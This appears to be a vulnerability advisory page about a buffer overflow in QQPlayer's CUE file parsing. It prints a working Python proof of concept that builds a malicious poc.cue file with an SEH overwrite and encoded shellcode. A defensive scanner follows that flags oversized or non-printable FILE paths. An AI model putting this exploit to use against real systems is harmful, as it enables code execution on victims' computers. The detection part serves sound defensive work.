QQPlayer CUE File Buffer Overflow Vulnerability - Vulnerability Warning - myhack58 (黑吧安全网)

2010-07-23T00:00:00
ID MYHACK58:62201027689
Type myhack58
Reporter Anonymous
Modified 2010-07-23T00:00:00

Description

Title: QQPlayer CUE File Buffer Overflow Exploit

Author: Lufeng Li of Neusoft Corporation

Vendor: www.qq.com

Platform: Windows XP SP3 Chinese Simplified

Tested: QQPlayer 2.3.696.400

Vulnerable: QQPlayer <= 2.3.696.400p1

Code:

```python
#!/usr/bin/env python
# QQPlayer CUE proof of concept. Byte literals and binary mode keep the
# on-disk layout identical under Python 2 and Python 3.

head = b'FILE "'          # opens the quoted FILE path of the CUE sheet
junk = b"A" * 780         # oversized filename that overruns the parser's buffer
nseh = b"\x42\x61\x21\x61"
seh = b"\xa9\x9e\x41\x00"
adjust = b"\x32\x42\x61\x33\xca\x83\xc0\x10"
shellcode = (b"hffffk4diFkTpj02Tpk0T0AuEE2C4s4o0t0w174t0c7l0t0v7l2z1l131o2q1k2d1l081o"
             b"0v1o0a7O2r0T3w3e1P0a7o0a3Y3K0l3w038n5l0c5p8k354q2j8n5o00pyvtx10x41pz41"
             b"H4A4I1TA71TADVTZ32PZNBFZDQC02DQD0D13DJE2C5CJO1E0G1I4T1R2M0T1V7L1TKL2CK"
             b"NK0KN2EKL08KN1FKO1Q7LML2N3W46607K7N684H310I9W025DOL1S905A4D802Z5DOO01")
junk_ = b"R" * 8000
# closes the quoted path and finishes a syntactically plausible CUE sheet
foot = b'.avi" VIDEO' + b"\x0a" + b"TRACK 02 MODE1/8888" + b"\x0a" + b"INDEX 08 08:08:08"

payload = head + junk + nseh + seh + adjust + shellcode + junk_ + foot

fobj = open("poc.cue", "wb")
fobj.write(payload)
fobj.close()
```
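From the defensive side, the file the script above produces is easy to recognise statically: a CUE `FILE` entry whose quoted filename runs to hundreds of bytes and carries non-printable characters. The scanner below is an added example written for this page; it is not part of the advisory and not QQPlayer code. It parses `FILE` lines with a regular expression and flags paths longer than Windows MAX_PATH or containing bytes outside printable ASCII. The 260-byte threshold, the function names and the two sample sheets are assumptions constructed for the example.

```python
import re

# Windows MAX_PATH. A FILE entry longer than this cannot name a real file, so an
# oversized quoted path is the simplest static indicator of the payload shape above.
MAX_PATH = 260

# CUE "FILE" line: FILE "<path>" <type>  or  FILE <path-without-spaces> <type>
FILE_LINE = re.compile(
    rb'^\s*FILE\s+(?:"(?P<quoted>[^"\r\n]*)"|(?P<bare>\S+))', re.IGNORECASE
)


def scan_cue(data):
    """Return [(line_no, reason), ...] for FILE entries in a CUE sheet given as bytes."""
    findings = []
    for line_no, line in enumerate(data.split(b"\n"), start=1):
        m = FILE_LINE.match(line)
        if m is None:
            continue
        path = m.group("quoted")
        if path is None:
            path = m.group("bare")
        if len(path) > MAX_PATH:
            findings.append(
                (line_no, "FILE path is %d bytes (> MAX_PATH %d)" % (len(path), MAX_PATH))
            )
        # bytearray() yields ints under both Python 2 and 3. Note that legitimate
        # sheets with non-ASCII (e.g. GBK) filenames also trip this, so treat it as
        # a weak signal next to the length check.
        if any(b < 0x20 or b > 0x7E for b in bytearray(path)):
            findings.append((line_no, "FILE path contains non-printable bytes"))
    return findings


def is_suspicious(data):
    """True when any FILE entry in the sheet trips a check."""
    return bool(scan_cue(data))


# Constructed sample sheets (not taken from the advisory).
BENIGN_CUE = (
    b'FILE "album.wav" WAVE\n'
    b"  TRACK 01 AUDIO\n"
    b"    INDEX 01 00:00:00\n"
)

# Same layout as a legitimate sheet, but the quoted path is far past MAX_PATH and
# carries a NUL byte: the shape the proof of concept above writes out.
OVERSIZED_CUE = b'FILE "' + b"A" * 1000 + b'\x00.avi" VIDEO\n' + b"TRACK 01 AUDIO\n"

if __name__ == "__main__":
    for name, data in (("benign", BENIGN_CUE), ("oversized", OVERSIZED_CUE)):
        print(name, scan_cue(data) or "clean")
```

Run over a directory of `.cue` files, this gives a cheap triage signal; a real media player would additionally bound the filename copy at the parser, which is the fix the overflow calls for.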